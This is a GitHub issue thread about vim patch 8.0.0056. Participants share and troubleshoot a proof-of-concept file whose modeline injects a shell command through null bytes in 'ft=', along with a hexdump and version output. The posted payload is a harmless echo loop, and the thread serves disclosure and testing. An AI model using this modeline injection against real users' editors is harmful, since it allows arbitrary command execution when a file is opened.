Re: [vim/vim] patch 8.0.0056 (d0b5138)

[Matlink]

Any PoC for this vuln?

—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub

[Sebastian Cato]

@matlink

I put together a PoC:

echo -e '// vim: set ft=\x00!while\\ true;\\ do\\ echo\\ bar;\\ done\x00 : ' > wzz
vim wzz

works for me and a colleague, but it may depend on your vim (doesn't work for a friend of mine, trying to figure out why)

00000000  2f 2f 20 76 69 6d 3a 20  73 65 74 20 66 74 3d 00  |// vim: set ft=.|
00000010  21 77 68 69 6c 65 5c 20  74 72 75 65 3b 5c 20 64  |!while\ true;\ d|
00000020  6f 5c 20 65 63 68 6f 5c  20 62 61 72 3b 5c 20 64  |o\ echo\ bar;\ d|
00000030  6f 6e 65 00 20 3a 20 0a                           |one. : .|
00000038

[Matlink]

Which version of vim you got?

Doesn't work on my 2:7.4.488-7 on debian.

[François Ingelrest]

On 23 November 2016 at 15:17, Matlink wrote:
> Doesn't work on my 2:7.4.488-7 on debian.

Have you upgraded the package? I got an upgrade this morning, I guess
it fixed the issue.

[Sebastian Cato]

@matlink

The other machine where it doesn't work is Ubuntu 14.04 (so debian based). What we saw there was that channel and job was not enabled (no +channel or +job in feature list).

Successful on Fedora, Arch and FreeBSD 11.0-RELEASE-p1 (though tcsh is the default shell there, and the test payload above is for bash, so SHELL should be set to /usr/local/bin/bash, or the test payload should be tcsh compatible)

FreeBSD version:

$ vim --version
VIM - Vi IMproved 8.0 (2016 Sep 12, compiled Oct  5 2016 15:43:16)
Included patches: 1-19
Compiled by root@110amd64-quarterly-job-16
Huge version without GUI.  Features included (+) or not (-):
+acl             +file_in_path    +mouse_sgr       +tag_old_static
+arabic          +find_in_path    +mouse_sysmouse  -tag_any_white
+autocmd         +float           +mouse_urxvt     -tcl
-balloon_eval    +folding         +mouse_xterm     +termguicolors
-browse          -footer          +multi_byte      +terminfo
++builtin_terms  +fork()          +multi_lang      +termresponse
+byte_offset     -gettext         -mzscheme        +textobjects
+channel         -hangul_input    +netbeans_intg   +timers
+cindent         +iconv           +num64           +title
-clientserver    +insert_expand   +packages        -toolbar
-clipboard       +job             +path_extra      +user_commands
+cmdline_compl   +jumplist        -perl            +vertsplit
+cmdline_hist    +keymap          +persistent_undo +virtualedit
+cmdline_info    +lambda          +postscript      +visual
+comments        +langmap         +printer         +visualextra
+conceal         +libcall         +profile         +viminfo
+cryptv          +linebreak       -python          +vreplace
+cscope          +lispindent      -python3         +wildignore
+cursorbind      +listcmds        +quickfix        +wildmenu
+cursorshape     +localmap        +reltime         +windows
+dialog_con      -lua             +rightleft       +writebackup
+diff            +menu            -ruby            -X11
+digraphs        +mksession       +scrollbind      -xfontset
-dnd             +modify_fname    +signs           -xim
-ebcdic          +mouse           +smartindent     -xpm
+emacs_tags      -mouseshape      +startuptime     -xsmp
+eval            +mouse_dec       +statusline      -xterm_clipboard
+ex_extra        -mouse_gpm       -sun_workshop    -xterm_save
+extra_search    -mouse_jsbterm   +syntax          
+farsi           +mouse_netterm   +tag_binary      
   system vimrc file: "/usr/local/etc/vim/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
       defaults file: "$VIMRUNTIME/defaults.vim"
  fall-back for $VIM: "/usr/local/etc/vim"
 f-b for $VIMRUNTIME: "/usr/local/share/vim/vim80"
Compilation: cc -c -I. -Iproto -DHAVE_CONFIG_H   -DLIBICONV_PLUG -I/usr/local/include  -O2 -pipe  -DLIBICONV_PLUG -fstack-protector -fno-strict-aliasing -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1      
Linking: cc   -fstack-protector -L/usr/local/lib -Wl,--as-needed -o vim               -lm -lelf  -ltermlib   

Fedora version:

$ vim --version
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Jun  2 2016 10:02:05)
Included patches: 1-1868
Modified by <bugz...@redhat.com>
Compiled by <bugz...@redhat.com>
Huge version without GUI.  Features included (+) or not (-):
+acl             +farsi           +mouse_netterm   +tag_binary
+arabic          +file_in_path    +mouse_sgr       +tag_old_static
+autocmd         +find_in_path    -mouse_sysmouse  -tag_any_white
-balloon_eval    +float           +mouse_urxvt     -tcl
-browse          +folding         +mouse_xterm     +termguicolors
++builtin_terms  -footer          +multi_byte      +terminfo
+byte_offset     +fork()          +multi_lang      +termresponse
+channel         +gettext         -mzscheme        +textobjects
+cindent         -hangul_input    +netbeans_intg   +timers
-clientserver    +iconv           +packages        +title
-clipboard       +insert_expand   +path_extra      -toolbar
+cmdline_compl   +job             +perl/dyn        +user_commands
+cmdline_hist    +jumplist        +persistent_undo +vertsplit
+cmdline_info    +keymap          +postscript      +virtualedit
+comments        +langmap         +printer         +visual
+conceal         +libcall         +profile         +visualextra
+cryptv          +linebreak       +python/dyn      +viminfo
+cscope          +lispindent      +python3/dyn     +vreplace
+cursorbind      +listcmds        +quickfix        +wildignore
+cursorshape     +localmap        +reltime         +wildmenu
+dialog_con      +lua/dyn         +rightleft       +windows
+diff            +menu            +ruby/dyn        +writebackup
+digraphs        +mksession       +scrollbind      -X11
-dnd             +modify_fname    +signs           -xfontset
-ebcdic          +mouse           +smartindent     -xim
+emacs_tags      -mouseshape      +startuptime     -xsmp
+eval            +mouse_dec       +statusline      -xterm_clipboard
+ex_extra        +mouse_gpm       -sun_workshop    -xterm_save
+extra_search    -mouse_jsbterm   +syntax          -xpm
   system vimrc file: "/etc/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
  fall-back for $VIM: "/etc"
 f-b for $VIMRUNTIME: "/usr/share/vim/vim74"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H     -O2 -g -pipe -Wall -Werror=format-security -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1      
Linking: gcc   -L. -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -fstack-protector -rdynamic -Wl,-export-dynamic -Wl,--enable-new-dtags -Wl,-z,relro   -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -L/usr/local/lib -Wl,--as-needed -o vim        -lm -lnsl  -lselinux   -lncurses -lacl -lattr -lgpm -ldl   -Wl,--enable-new-dtags -Wl,-z,relro  -Wl,-z,relro  -fstack-protector-strong -L/usr/local/lib  -L/usr/lib64/perl5/CORE -lperl -lpthread -lresolv -lnsl -ldl -lm -lcrypt -lutil -lc        

[James McCoy]

That's because I disable modelines by default in Debian (not just for root) and recommend using a plugin like securemodelines instead.

—
You are receiving this because you are subscribed to this thread.

Reply to this email directly, view it on GitHub, or mute the thread.

[Matlink]

How to reproduce such a bug in debian then? Is it possible to switch
+channel and +job on without re-compiling?

[James McCoy]

It has nothing to do with +channel or +job. You just need modelines enabled and syntax highlighting enabled.

[Matlink]

Enabling modelines and syntax highlighting pops me an error like this
(translated from french):
"wzz" 1L, 56C
Detected error processing modelines :
line 1 :
E474: Invalid argument: ft=^@!while\ true;\ do\ echo\ bar;\ done^@
Press ENTER or type a command to continue

[James McCoy]

Because you have an updated Vim which fixes the problem.

[Matlink]

My bad, the vim I used was patched.
Working with vim=2:7.4.488-7 with in .vimrc:
```
set modeline
syntax on
```

and this PoC:

|echo -e '// vim: set ft=\x00!while\\ true;\\ do\\ echo\\ bar;\\ done\x00
: ' > wzz vim wzz|

[Christian Brabandt]

Yes, your vim has been fixed (Debian already provides a backported fix)